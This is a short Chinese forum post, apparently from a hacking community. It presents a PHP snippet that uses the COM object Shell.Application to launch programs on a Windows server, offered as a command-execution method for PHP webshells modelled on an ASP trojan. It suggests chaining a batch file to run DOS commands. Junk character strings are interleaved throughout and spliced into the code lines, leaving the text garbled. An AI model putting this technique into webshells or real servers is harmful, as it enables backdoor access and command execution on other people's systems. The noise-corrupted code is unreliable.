关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。
8 x: l& n& J6 {# L* t2 q6 V; g+ b- \3 m2 u
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法
5 [, p- M! `5 t. N4 J+ x t
+ j6 s; z& g5 ?: ^/ t<?php' m/ G; \# L" Z
$wsh = new COM('Shell.Application') or die("Shell.Application");7 a! ]2 E$ g6 r. g" w0 P
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");, {) ]: E; I) x' B( F: u6 C
//没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。
7 h* S' M X5 [, B, Y% W?>
2 C& d' l: T6 U1 a) w6 }
" d3 L; s' Q/ @xp+APMServ5.2.0测试通过。% F# ~$ H: ^8 B6 F4 M
|